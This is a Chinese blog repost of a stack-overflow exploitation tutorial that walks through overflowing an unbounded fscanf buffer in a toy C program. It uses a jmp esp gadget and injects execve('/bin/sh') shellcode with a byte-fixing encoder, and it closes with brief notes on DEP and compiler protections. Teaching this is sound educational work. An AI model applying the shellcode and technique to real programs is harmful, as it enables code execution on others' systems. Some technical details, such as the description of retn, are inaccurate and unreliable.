如何利用栈溢出执行指定的的代码_栈溢出原理和利用

最新推荐文章于 2024-08-27 17:21:52 发布
最新推荐文章于 2024-08-27 17:21:52 发布
阅读量562 收藏 1
点赞数
文章标签: 如何利用栈溢出执行指定的的代码

作者:自然dashen

原文&附件链接:[原创]栈溢出原理和利用-『二进制漏洞』-看雪安全论坛

案例代码

int main(void){char cPas[20]={20 *0};int iResult;FILE* pFile = NULL;pFile = fopen("pd.txt", "r");fscanf(pFile, "%s",cPas);iResult=strcmp(Password, cPas);if(iResult == 0){printf("Welcomrn");}else{printf("failrn");}fclose(pFile);return 0;}

栈溢出原理

  • 栈溢出是指向向栈中写入了超出限定长度的数据,溢出的数据会覆盖栈中其它数据,从而影响程序的运行。

+ fscanf()函数(有点像正则表达式):功 能: 从一个流中执行格式化输入,fscanf遇到空格和换行时结束,注意空格时也结束。用 法:int fscanf(FILE *stream, char *format,[argument...]);

  • 案例代码中fscanf读取文件到cPas中,没有限定读多少,那么可以读大量的16进制到栈里
  • 如图:
    把断点下到fscanf这个函数在这里,注释是我自己写的
    可以发现buff是ecx的值,所有在堆栈那里跟到buff
    然后选择锁定堆栈,为了让我们方便观看这一块堆栈

aac2245e33e0453920d58f10cbea3ed3.png


F8单步走一步,然后发现读的值在栈里面了,可以发现下面有个返回地址,
如果我们把读的数据返回地址给覆盖成我们的代码地址呢?是不是就可以执行我们的代码了。返回地址是6*7=28字节后面的4自己改我们的返回地址

6423eca4d07e8c645e23c5a7c978209f.png


由上图可以知道第25个字节是我们的返回地址,编写好记住栈的返回地址的地址是0018FF4c,我们往这个地址里面改成我们需要返回的地址内容,我改的是0018FF50,下面是我的nop代码

1b28bc52ea53b0bd9416ac42207cdb1e.png


F8执行fscanf,读入的数据把返回地址覆盖了,返回地址变成了0018FF50,

060af17fd3a0a20a8d6a69b418653afd.png


最后走到retn的地方,retn的操作是jmp esp 并且 pop esp
所有单步F8的话会到0018FF50这个地方执行代码

d00069fae6a87a09c251da814a0b6de4.png


观察Eip和反汇编窗口,发现执行了我们的代码

b4e6034cdc4c8725df4d5bff1b1e3207.png

栈溢出漏洞的利用

  • 问题
  1. 首先栈的位置不一定能确定,那么返回值的代码同样不能确定,我们的目的是要在返回函数地址的下一行执行我们的代码
  2. fscanf函数在读取到0XA,0XC,0X20...这样的Hex时会被中断
  • 解决问题
    • 第一个问题我们可以使用jmp esp这个解决,HEX为FF E4,在返回地址处填上jmp esp这句代码的地址,这个exe的代码里面搜索到FF E4,把返回地址改成这个即可。
      • 搜索方法:
        ALT+M 然后Ctrl+B搜索

697190638beed2c7e78a05ebd0467d59.png


使用插件搜索

b7ab5edad9513a5b92b232d7fe566944.png


可以发现非常多的log,这里我们一般选择主模块(随机基址会出问题)的或者kerenl32.dll、ntdll.dll,窗口的程序加上user32.dll(Winows必定会加载的dll,加载顺序都一样,但是可能系统版本不一样,导致dll不一样),这里看情况办事了

65e42bbfe3b6cfb7e6a2986e0217bb3f.png

1c569ecad050e7c51cad26d61ff2917a.png
    • 第二个问题我们可以对fscanf代码进程加密使其不产生这些Hex
      • 使用工具

f7c724bc623079b7f955d94bf9debbfc.png


特征文件的后缀是.fea

3099faea1cfed6f21ed9820e6f385fa9.png

cae7ba396f053dd54c8366faf222d9e4.png


需要异或的代码后缀是.code

利用漏执行shellcode

论坛随便看到的shellcode

0a2dd660512fdeb949627c410099a4dc.png

Explanation:6a 0b push 0xb58 pop eax 99 cdq 68 2f 73 68 00 push 0x68732f 68 2f 62 69 6e push 0x6e69622f89 e3 mov ebx,esp 31 c9 xor ecx,ecx cd 80 int 0x80

然后就是发现这段shellcode里面有 cd 0b这样的阶段HEX
所以我自己写了改这段代码的shellcode

.386.model flat, stdcall ;32 bit memory modeloption casemap :none ;case sensitive.codestart:call NextNext:pop ebxsub ebx,offset Nextlea eax,[ebx+offset mydata];1Bh==>Bhmov bl,[eax+1]sub bl,10hmov [eax+1],bl;0CEh==>CDhmov bl,[eax+18]dec blmov [eax+18],blmydata db 6Ah,1Bh,58h,099h,68h,2Fh,73h,68h,00h,68h,2Fh,62h,69h,6Eh,89h,0E3h,31h,0C9h,0CEh,80hretend start

编译链接exe,用winhex打开复制shellcode代码

957ce393de0a6179ad060c7b7e828a7d.png

复制到我们的输入中去

c9614f145db1d7d4aa7f586df953edd0.png


OD执行下

7fee2c4bb4ce5361b2f0319673ec6480.png

7fee2c4bb4ce5361b2f0319673ec6480.png

怎么防止栈溢出漏洞

  1. 系统中开启DEP(数据保护执行)

5f4caf2266fbf65d269743635875db6e.png
  1. 编译的时候VS中有选项

a3ecf3f6de99024c3fb9af2ad59eafa8.png
weixin_39707612
关注
初识栈溢出利用栈溢出的四种攻击方法
Kni9hT's Blog
07-22 5916
栈溢出 本质: 混淆了用户输入与栈上的元数据 产生原因: 用户输入的数据大小超过了程序预留的空间大小 利用: 覆盖返回地址 覆盖栈上的变量,例如函数指针或对象指针 基本栈溢出漏洞实例:实际演示 stack_shellcode 以python语言举例, 运行报错。 据我理解,在python中,函数调用一次,栈(stack)多加一层栈帧,由于栈帧的增加有上限,函数调用次数过多会导致栈溢出。(在c语...
二进制菜鸟之栈溢出漏洞利用思路
Blood_Pupil的博客
08-06 979
作为一只二进制菜鸟,不,应该是作为一只各安全领域的菜鸟,感觉二进制学的还是蛮开心的,每天也都能学到点新的东西,调试代码的过程也是非常令人开心。今天总结下目前学到的栈溢出漏洞的利用思路 栈溢出漏洞简介 我们知道C语言中有些字符串操作函数不会对字符串的长度进行检查,比如strcpy。 #include<stdio.h> #include<string.h> char nam...
pwntools使用初探——简单栈溢出利用
小小鱼的博客
06-03 1648
注意的坑: buf长度要足够长,至少要大于shellcode的长度 pwntools生成shellcode的时候要在shellcract语句前面加上context
【软件与系统安全】上机作业practice1-栈溢出利用的分析_简单栈溢出实验
最新发布
zzz6583zz的博客
08-27 1013
本次栈溢出攻击实验,有以下关键点:在编译时使用了(启用可执行堆栈)和(禁用栈保护)选项程序运行时关闭 ALSR(地址空间随机化),导致 shellcode 的地址可以直接确定stack 程序中的 bof 函数存在栈溢出漏洞,修改 bof 函数的返回地址后,可以使程序一步步跳转到 shellcode 位置,从而实现栈溢出攻击,得到shell学习计划安排我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~
栈溢出利用-----jmp esp
qq_41683305的博客
02-14 1051
通过jmp esp利用栈溢出,首先我们要找出jmp esp 的地址,因为系统不同,通用jmp esp的地址可能不同,下面的代码是找出jmp esp的地址的: #include<windows.h> #include<iostream.h> #include<tchar.h> int main() { int nRetCode=0; bool we_load_i...
手把手教你栈溢出从入门到放弃(上)
G653214的博客
11-11 631
0x00 写在最前面 开场白:快报快报!今天是2017 Pwn2Own黑客大赛的第一天,长亭安全研究实验室在比赛中攻破Linux操作系统和Safari浏览器(突破沙箱且拿到系统最高权限),积分14分,在11支队伍中暂居 Master of Pwn 第一名。作为热爱技术乐于分享的技术团队,我们开办了这个专栏,传播普及计算机安全的“黑魔法”,也会不时披露长亭安全实验室的最新研究成果。 安全领域博大精深,很多童鞋都感兴趣却苦于难以入门,不要紧,我们会从最基础的内容开始,循序渐进地讲给大家。技术长路漫漫,我们携
栈溢出利用小结
Juny0117的博客
11-30 188
栈溢出利用小结 栈溢出是最简单的漏洞了,主要是通过学习栈溢出,学习其绕过保护机制的利用。 这里先用一道典型的题secretkeeper来进入。利用方式就是典型的地址泄露+ret2libc。 其漏洞的位置在修改secret的时候出现的: 现在我们来测一下。输入选择4,然后300个A,程序出现问题。 现在找到漏洞了,就太好了,...
栈溢出漏洞
03-30
在“湖湘杯2016网络安全技能大赛pwnme”这个挑战中,参赛者可能需要理解栈溢出的工作原理,分析提供的程序代码,寻找可能的溢出点,然后构造特定的输入数据来覆盖返回地址,实现控制程序执行流程的目的。这需要扎实...
栈溢出攻击技术及实例代码
06-11
在"栈溢出攻击技术"这个主题中,我们首先需要理解栈的基本结构和工作原理。栈遵循“后进先出”(LIFO)的原则,新进入的数据会放在栈顶,最先进入的数据会在最后被处理。当函数调用时,栈会保存返回地址,以便在函数...
栈溢出原理及解题练习
weixin_44222568的博客
04-15 1946
一个小白的慢慢理会过程
栈溢出利用解析:从原理到实战
栈溢出利用是一种利用程序中存在的缓冲区溢出漏洞,来篡改内存中变量的值或控制程序执行流的技术。当程序在处理大缓冲区时,如果没有正确检查边界,就会发生溢出,溢出的数据可能会覆盖栈上的相邻变量,包括返回地址...
栈溢出原理利用学习
sinat_31054897的博客
09-05 1万+
做PWN题经常遇到栈溢出,有时一些栈的基础知识总是记不清楚,脑子卡顿,所以整理一番,让自己彻底记住它! 1. 什么是栈? 栈,即堆栈,是一种具有一定规则的数据结构,它按照先进后出的原则存储数据,先进入的数据被压入栈底,最后的数据在栈顶。 堆栈数据结构的两种基本操作: PUSH:将数据压入栈顶 POP :将栈顶数据弹出 知道了什么是栈,我们看看栈在内存中是怎样一个分布情况。 以Linu...
栈又溢出了
11-03 387
stackoverflow again! 编译器什么时候会生成检查栈的代码呢?_chkstk 内部都做了哪些事呢?该如何避免呢?本文以一个实际项目中的栈溢出为出发点,尽量挖掘出栈溢出背后的一些逻辑。欢迎留言交流!
如何利用栈溢出执行指定的的代码_栈溢出攻击(2)ROP基础(1)
weixin_39668527的博客
11-30 388
预备条件ret2shellcode程序:http://www.hacksprit.top:8090/files/ret2shellcode ret2text程序: http://www.hacksprit.top:8090/files/ret2text 关闭系统的ASLR栈溢出在这里对栈溢出进行了介绍。ROP学习过Java的人对*OP应该都有所了解,比如OOP(面向对象编程),比如AOP...
Access出现“文件共享锁定数溢出”修改注册表路径
Nihilismnes的博客
02-28 3616
复制数据到Access时出现“文件共享锁定数溢出”提示,是因为复制数据量超出额定数据量,解决方法是Win+R打开运行,输入"regedit"打开注册表编辑器,增加MaxLocksPerFile十进制的数据数值。方法很简单,但实际上不同版本的Access有不同的路径,提供一个我修改成功的路径供大家参考:
共享服务器文件溢出,文件共享锁定数溢出
weixin_32867521的博客
08-10 2699
原因Access同时添加删除9500条数据以上,就会出现文件共享锁定数溢出(Error 3052)的问题解决办法修改注册表中的MaxLocksPerFile值修改步骤打开注册表:在运行输入regedit,点击确定。依次找到注册表[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Jet\4.0\Engines\Jet 4.0]双击MaxLocksPerFile修改注册表M...
如何解决栈溢出
热门推荐
逆风飞扬的专栏
01-13 4万+
1,什么是栈溢出?因为栈一般默认为1-2m,一旦出现死循环或者是大量的递归调用,在不断的压栈过程中,造成栈容量超过1m而导致溢出。2,解决方案:方法一:用栈把递归转换成非递归通常,一个函数在调用另一个函数之前,要作如下的事情:a)将实在参数,返回地址等信息传递给被调用函数保存; b)为被调用函数的局部变量分配存储区;c)将控制转移到被调函数的入口. 从被调用函数返回调用函数之前,也要做三件事情:a)保存被调函数的计算结果;b)释放被调函数的数据区;c)依照被调函数保存的返回地址将控制转移到调用函数.所有的这
【实验】栈溢出攻击:代码植入
qq_63982199的博客
05-05 350
《0day安全》书中的通过栈溢出达到的代码植入实验记录。将返回地址修改到buffer数组的地址,执行buffer数组中的代码达成目的。
手把手教你栈溢出从入门到放弃(下)
G653214的博客
11-11 946
0x10 上期回顾 上篇文章介绍了栈溢出原理和两种执行方法,两种方法都是通过覆盖返回地址来执行输入的指令片段(shellcode)或者动态库中的函数(return2libc)。本篇会继续介绍另外两种实现方法。一种是覆盖返回地址来执行内存内已有的代码片段(ROP),另一种是将某个函数的地址替换成另一个函数的地址(hijack GOT)。 0x20 相关知识 0x21 寄存器 在上篇的背景知识中,我们提到了函数状态相关的三个寄存器--esp,ebp,eip。下面的内容会涉及更多的寄存器,所以我们大
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值